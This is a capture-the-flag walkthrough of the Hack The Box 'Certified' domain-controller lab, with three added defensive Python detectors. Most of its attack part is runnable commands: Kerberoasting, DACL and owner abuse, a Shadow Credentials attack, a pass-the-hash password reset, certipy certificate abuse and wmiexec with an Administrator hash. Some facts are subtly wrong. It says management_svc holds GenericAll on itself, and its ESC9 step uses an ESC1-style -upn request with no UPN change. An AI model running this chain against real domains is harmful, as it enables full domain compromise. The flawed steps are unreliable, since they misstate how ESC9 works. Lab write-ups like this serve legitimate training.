HTB Certified Walkthrough

Author: Ankit

Overview

  • Initial Credentials: Used provided credentials (judith.mader:judith09) for enumeration.
  • SMB Enumeration: Identified accessible shares but found no useful data.
  • Kerberoasting: Extracted a service account hash but couldn't crack it.
  • BloodHound Analysis: Discovered privilege escalation paths using domain enumeration.
  • Privilege Escalation to management_svc:
    • Leveraged WriteOwner and GenericWrite rights on the Management group.
    • Performed a Shadow Credentials attack to gain access to management_svc.
  • Privilege Escalation to ca_operator:
    • Used the NTLM hash of management_svc to reset ca_operator’s password.
  • Privilege Escalation to Administrator:
    • Exploited an ESC9 vulnerability in the certificate template.
    • Requested and used a certificate to authenticate as Administrator.
  • Final Compromise: Obtained the NT hash for the Administrator account and achieved domain admin privileges.

The machine's page on Hack The Box gives us a hint to start with:

As is common in real-life Windows pentests, you start the Certified box with credentials for the following account:

judith.mader / judith09

Initial Enumeration

We begin with an Nmap scan to identify open ports and services:

nmap -p- -sC -sV 10.10.11.41


This scan reveals that the target is likely an Active Directory domain controller. Based on the results, we add entries to our hosts file mapping 10.10.11.41 to certified.htb and dc01.certified.htb, the names the later commands rely on.

SMB Enumeration

Using the provided credentials, we enumerate SMB shares:

smbmap -H 10.10.11.41 -u judith.mader -p judith09


The command lists available SMB shares. We find that SYSVOL and NETLOGON are accessible but don’t contain any immediately useful information.

Kerberoasting Attempt

We attempt a Kerberoasting attack using Impacket:

impacket-GetUserSPNs -dc-ip 10.10.11.41 -request certified.htb/judith.mader:judith09

This yields a hash for the management_svc account, but unfortunately, we are unable to crack it with hashcat.
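The Kerberoasting attempt above (and technique 1 in the Techniques Used list at the end) has a direct detection counterpart on the defender's side. The following is an added example, not code from this walkthrough or from Impacket: it triages constructed sample records in the shape of Windows Security event 4769 (Kerberos service ticket requested) and flags service-ticket requests for user accounts that use RC4 encryption, which is what an offline-crackable Kerberoast ticket looks like on the wire. The field names and sample values are assumptions, not output from the Certified box.

```python
from collections import defaultdict

# Constructed sample records (not real logs) in the shape a SIEM extracts from
# event 4769: requesting account, target service name, ticket encryption type
# and the client address. Field names are assumptions.
SAMPLE_4769 = [
    {"account": "judith.mader@CERTIFIED.HTB", "service": "management_svc",
     "enc_type": "0x17", "src_ip": "10.10.14.5"},
    {"account": "judith.mader@CERTIFIED.HTB", "service": "DC01$",
     "enc_type": "0x12", "src_ip": "10.10.14.5"},
    {"account": "judith.mader@CERTIFIED.HTB", "service": "krbtgt",
     "enc_type": "0x12", "src_ip": "10.10.14.5"},
    {"account": "WS01$@CERTIFIED.HTB", "service": "DC01$",
     "enc_type": "0x12", "src_ip": "10.10.11.50"},
]

# Ticket encryption types whose key is derived directly from the account's NT hash
# and therefore cracks quickly offline: 0x17 RC4-HMAC, 0x18 RC4-HMAC-EXP.
RC4_ENC_TYPES = {"0x17", "0x18"}


def is_roastable_service(service: str) -> bool:
    """Only user accounts with SPNs are worth roasting: machine accounts ($) carry
    long random passwords, and krbtgt service requests are ordinary TGT traffic."""
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoasting(events, rc4_only=True, min_services=1):
    """Group suspicious 4769 records per requesting account.

    Returns {account: {"services": [...], "sources": [...]}} for every account
    that requested tickets for at least `min_services` distinct user SPNs.
    A single RC4 ticket for a user SPN is already notable on a domain where
    service accounts support AES; raise `min_services` where RC4 is still common.
    """
    seen = defaultdict(lambda: {"services": set(), "sources": set()})
    for ev in events:
        if not is_roastable_service(ev["service"]):
            continue
        if rc4_only and ev["enc_type"] not in RC4_ENC_TYPES:
            continue
        seen[ev["account"]]["services"].add(ev["service"])
        seen[ev["account"]]["sources"].add(ev["src_ip"])
    return {
        acct: {"services": sorted(v["services"]), "sources": sorted(v["sources"])}
        for acct, v in seen.items() if len(v["services"]) >= min_services
    }


if __name__ == "__main__":
    for acct, hit in detect_kerberoasting(SAMPLE_4769).items():
        print(f"{acct}: RC4 service tickets for {hit['services']} from {hit['sources']}")
```

Only the first sample record survives the filter: an RC4 ticket for the management_svc SPN requested by judith.mader. The corresponding mitigation is to make that signal rare and the ticket useless: give service accounts AES-only encryption types (or move them to gMSAs), which forces requests to 0x12 and leaves RC4 requests for user SPNs standing out as anomalies.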

BloodHound Analysis

We use BloodHound to map out the domain:

bloodhound-python -d certified.htb -u "judith.mader" -p "judith09" -dc dc01.certified.htb -ns 10.10.11.41 --zip -c All

After analyzing the results in BloodHound, we discover:

  • judith.mader has WriteOwner rights on the Management group.
  • The Management group has GenericWrite rights on management_svc.
  • The management_svc account has GenericAll rights on itself.

Privilege Escalation to management_svc

First, we give judith.mader ownership of the Management group:

impacket-owneredit -action write -new-owner "judith.mader" -target "Management" certified.htb/judith.mader:judith09

Next, we give judith.mader full control over the Management group:

impacket-dacledit -action "write" -rights "FullControl" -principal "judith.mader" -target "Management" certified.htb/judith.mader:judith09

Now we add judith.mader to the Management group:

net rpc group addmem "Management" "judith.mader" -U certified.htb/"judith.mader"%"judith09" -S 10.10.11.41

With these permissions, we perform a Shadow Credentials attack on management_svc:

pywhisker -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"

This generates a certificate file (e.g., lNR55Oli.pfx) and a password.

We then use this certificate to get a TGT for management_svc:

gettgtpkinit -cert-pfx lNR55Oli.pfx -pfx-pass N5bhtamnAnLKczV3nIsv certified.htb/management_svc management_svc.ccache

Finally, we extract the NTLM hash. The key to pass here is the AS-REP encryption key that gettgtpkinit printed in the previous step, and KRB5CCNAME must point at the management_svc.ccache file it wrote:

getnthash -key <AS-REP encryption key> certified.htb/management_svc
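Every step from owneredit through pywhisker is a write to a directory object, so the whole chain (and techniques 3 and 6 in the Techniques Used list) is visible to a defender through Windows Security event 5136 (directory service object modified), provided "Audit Directory Service Changes" is enabled and the objects carry a SACL that audits writes. The following is an added example, not code from this walkthrough or from the tools it uses: it maps constructed records shaped like 5136's fields onto the steps of the escalation above. Field names and sample values are assumptions.

```python
# Constructed sample records (not real logs) in the shape of event 5136 fields:
# who changed which attribute on which object. Field names are assumptions.
SAMPLE_5136 = [
    {"subject": "judith.mader",
     "object": "CN=Management,CN=Users,DC=certified,DC=htb", "class": "group",
     "attribute": "nTSecurityDescriptor", "op": "Value Added"},
    {"subject": "judith.mader",
     "object": "CN=Management,CN=Users,DC=certified,DC=htb", "class": "group",
     "attribute": "member", "op": "Value Added",
     "value": "CN=judith.mader,CN=Users,DC=certified,DC=htb"},
    {"subject": "judith.mader",
     "object": "CN=management_svc,CN=Users,DC=certified,DC=htb", "class": "user",
     "attribute": "msDS-KeyCredentialLink", "op": "Value Added"},
    {"subject": "DC01$",
     "object": "CN=WS01,CN=Computers,DC=certified,DC=htb", "class": "computer",
     "attribute": "servicePrincipalName", "op": "Value Added"},
]

# Attributes whose modification corresponds to one step of the chain in the walkthrough.
WATCHED_ATTRIBUTES = {
    "ntsecuritydescriptor": "owner or DACL rewritten (owneredit / dacledit)",
    "member": "group membership changed (net rpc group addmem)",
    "msds-keycredentiallink": "key credential written (Shadow Credentials / pywhisker)",
}


def rdn_value(dn: str) -> str:
    """'CN=Management,CN=Users,DC=certified,DC=htb' -> 'Management'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def triage_5136(events):
    """Return one alert per watched-attribute modification, in log order.

    cross_principal is True when a principal writes to an object other than its
    own account. That is the pattern of every step in the chain above
    (judith.mader -> Management group -> management_svc) and is rarely routine
    for a standard user account.
    """
    alerts = []
    for ev in events:
        step = WATCHED_ATTRIBUTES.get(ev["attribute"].lower())
        if step is None:
            continue
        target = rdn_value(ev["object"])
        alerts.append({
            "subject": ev["subject"],
            "object": target,
            "object_class": ev["class"],
            "step": step,
            "cross_principal": ev["subject"].rstrip("$").lower() != target.lower(),
        })
    return alerts


def chains_by_subject(alerts):
    """Group alerts by acting principal so a multi-step escalation reads as one sequence."""
    chains = {}
    for a in alerts:
        chains.setdefault(a["subject"], []).append(f'{a["step"]} on {a["object"]}')
    return chains


if __name__ == "__main__":
    for subject, steps in chains_by_subject(triage_5136(SAMPLE_5136)).items():
        print(subject)
        for step in steps:
            print("  -", step)
```

Run against the sample, the SPN change by DC01$ is ignored and the three writes by judith.mader come out as one ordered sequence: DACL rewrite on Management, membership change on Management, key credential on management_svc. A key-credential write to a user object by a different, non-administrative principal deserves a high-severity rule of its own; the other two attributes are noisier and are best correlated by subject as done here.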

Privilege Escalation to ca_operator

With the NTLM hash for management_svc, we change ca_operator’s password:

pth-net rpc password "ca_operator" -U "certified.htb"/"management_svc"%"ffffffffffffffffffffffffffffffff":"<NTLM hash>" -S 10.10.11.41

When prompted, we set the new password to Password123.

Privilege Escalation to Administrator

Using ca_operator credentials, we enumerate vulnerable certificate templates:

certipy-ad find -dc-ip 10.10.11.41 -u ca_operator@certified.htb -p "Password123" -vulnerable -stdout

This reveals an ESC9 vulnerability in the CertifiedAuthentication template.
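certipy-ad reports the template as ESC9, but the walkthrough does not spell out what makes a template ESC9. As an added example (not certipy's code and not part of the original post), the check below encodes the conditions that combine into ESC9 and evaluates them over two constructed template descriptions: the CT_FLAG_NO_SECURITY_EXTENSION bit in msPKI-Enrollment-Flag, an authentication EKU, no manager approval, enrollment by non-administrative principals, and a KDC whose StrongCertificateBindingEnforcement registry value is below 2. The dictionary keys, the principal names and the HIGH_PRIV_PRINCIPALS set are assumptions.

```python
# msPKI-Enrollment-Flag bit that tells the CA to omit the szOID_NTDS_CA_SECURITY_EXT
# (1.3.6.1.4.1.311.25.2) SID extension from certificates issued from the template.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

CLIENT_AUTH_EKU = "1.3.6.1.5.5.7.3.2"
SMARTCARD_LOGON_EKU = "1.3.6.1.4.1.311.20.2.2"
ANY_PURPOSE_EKU = "2.5.29.37.0"
AUTH_EKUS = {CLIENT_AUTH_EKU, SMARTCARD_LOGON_EKU, ANY_PURPOSE_EKU}

# Principals whose enrollment rights are not treated as a finding (assumed list).
HIGH_PRIV_PRINCIPALS = {"CERTIFIED\\Domain Admins", "CERTIFIED\\Enterprise Admins"}

# Constructed template descriptions; the keys are assumptions, not LDAP attribute names.
TEMPLATES = {
    "CertifiedAuthentication": {
        "enrollment_flag": CT_FLAG_NO_SECURITY_EXTENSION,
        "ekus": [CLIENT_AUTH_EKU],
        "manager_approval": False,
        "enroll_principals": ["CERTIFIED\\ca_operator"],
    },
    "User": {
        "enrollment_flag": 0x20,  # CT_FLAG_AUTO_ENROLLMENT only
        "ekus": [CLIENT_AUTH_EKU],
        "manager_approval": False,
        "enroll_principals": ["CERTIFIED\\Domain Users"],
    },
}


def audit_esc9(template, kdc_strong_binding):
    """Evaluate the ESC9 conditions for one template.

    kdc_strong_binding is the KDC's StrongCertificateBindingEnforcement value
    (HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc): 0 disabled, 1 compatibility,
    2 full enforcement. Returns {"exploitable": bool, "met": [descriptions]};
    the template is exploitable only when every condition holds.
    """
    ekus = set(template["ekus"])
    low_priv = [p for p in template["enroll_principals"] if p not in HIGH_PRIV_PRINCIPALS]
    conditions = [
        (bool(template["enrollment_flag"] & CT_FLAG_NO_SECURITY_EXTENSION),
         "CT_FLAG_NO_SECURITY_EXTENSION set: issued certificates carry no SID extension"),
        (not ekus or bool(ekus & AUTH_EKUS),
         "template permits client authentication (auth EKU or no EKU)"),
        (not template["manager_approval"],
         "no manager approval required"),
        (bool(low_priv),
         "enrollment allowed for non-administrative principals: " + ", ".join(low_priv)),
        (kdc_strong_binding != 2,
         f"KDC StrongCertificateBindingEnforcement={kdc_strong_binding}: weak mapping still accepted"),
    ]
    met = [desc for ok, desc in conditions if ok]
    return {"exploitable": len(met) == len(conditions), "met": met}


def audit_all(templates, kdc_strong_binding):
    """Audit every template against the same KDC setting."""
    return {name: audit_esc9(t, kdc_strong_binding) for name, t in templates.items()}


if __name__ == "__main__":
    for name, result in audit_all(TEMPLATES, kdc_strong_binding=1).items():
        print(name, "ESC9" if result["exploitable"] else "ok")
        for line in result["met"]:
            print("  -", line)
```

With the KDC in compatibility mode (value 1) only CertifiedAuthentication meets all five conditions; the User template fails on the flag alone, and CertifiedAuthentication stops being exploitable as soon as the KDC is moved to full enforcement (value 2). Either fix on its own closes the finding: clear CT_FLAG_NO_SECURITY_EXTENSION on the template so certificates carry the SID extension again, or set StrongCertificateBindingEnforcement to 2 once all certificates in use were issued with that extension, as described in Microsoft's KB5014754 guidance.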

We exploit this vulnerability to request a certificate for the Administrator account:

certipy-ad req -u 'ca_operator@certified.htb' -p 'Password123' \
  -target dc01.certified.htb \
  -ca certified-DC01-CA \
  -template CertifiedAuthentication \
  -upn 'administrator@certified.htb' \
  -dc-ip 10.10.11.41

This generates a certificate file for the Administrator account.

Finally, we use this certificate to authenticate as Administrator:

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41

This gives us the NT hash for the Administrator account, which allows us to gain access:

impacket-wmiexec -hashes :0d5b49608bbce1751f708748f67e2d34 Administrator@10.10.11.41
Impacket v0.12.0

C:\>whoami
certified\administrator

And with that, we've successfully compromised the Certified machine and achieved domain admin privileges.

Clarification of the commands

Below is a breakdown of the key commands used in this walkthrough, along with their purpose:

  • nmap -p- -sC -sV 10.10.11.41: Scans all ports and performs service/version detection to identify open ports and services running on the target.
  • smbmap -H 10.10.11.41 -u judith.mader -p judith09: Enumerates SMB shares accessible with the provided credentials.
  • impacket-GetUserSPNs: Requests service tickets for accounts with SPNs, enabling Kerberoasting by retrieving encrypted hashes that can be cracked offline.
  • bloodhound-python: Collects data from Active Directory to map out privilege escalation paths using BloodHound.
  • impacket-owneredit: Modifies ownership of an AD object, allowing control over permissions for privilege escalation.
  • impacket-dacledit: Edits DACL (Discretionary Access Control List) permissions to grant specific rights (e.g., full control) over an object.
  • net rpc group addmem: Adds a user to a specified AD group via SMB, leveraging modified permissions.
  • pywhisker: Performs Shadow Credentials attacks by adding a certificate for a target account in AD, enabling authentication as that account.
  • gettgtpkinit: Retrieves a TGT (Ticket Granting Ticket) using a certificate, enabling further attacks or access to resources as the target user.
  • certipy-ad find: Enumerates vulnerable certificate templates in Active Directory for exploitation.
  • certipy-ad req: Exploits vulnerable certificate templates to request certificates for privileged accounts like Administrator.
  • certipy-ad auth: Authenticates to Active Directory using a certificate, bypassing traditional password-based authentication.
  • impacket-wmiexec: Executes commands on the target system via WMI (Windows Management Instrumentation), often used for post-exploitation.

Techniques Used

  1. Kerberoasting: A technique where service tickets are requested for accounts with SPNs. These tickets are encrypted with the service account's password hash, which can be cracked offline to retrieve credentials.

  2. BloodHound Analysis: BloodHound is used to analyze Active Directory environments and identify privilege escalation paths by mapping out relationships and permissions.

  3. Shadow Credentials Attack: Uses write access to a target account (here, the GenericWrite that the Management group holds over management_svc) to add an attacker-controlled key credential to the account's msDS-KeyCredentialLink attribute. The matching certificate can then be used to authenticate as that account via PKINIT.

  4. ESC9 Vulnerability Exploitation: Exploits weak configurations in AD Certificate Services where certificate templates allow low-privileged users to request certificates for privileged accounts.

  5. NTLM Hash Extraction and Pass-the-Hash (PTH): Extracts NTLM hashes from compromised accounts and reuses them for authentication without needing plaintext passwords.

  6. DACL Abuse (WriteOwner & GenericWrite): Leverages misconfigured permissions (e.g., WriteOwner, GenericWrite) on AD objects to escalate privileges by modifying ownership or access control lists.

  7. Certificate-Based Authentication: Uses certificates instead of passwords to authenticate as privileged accounts, bypassing traditional password-based protections.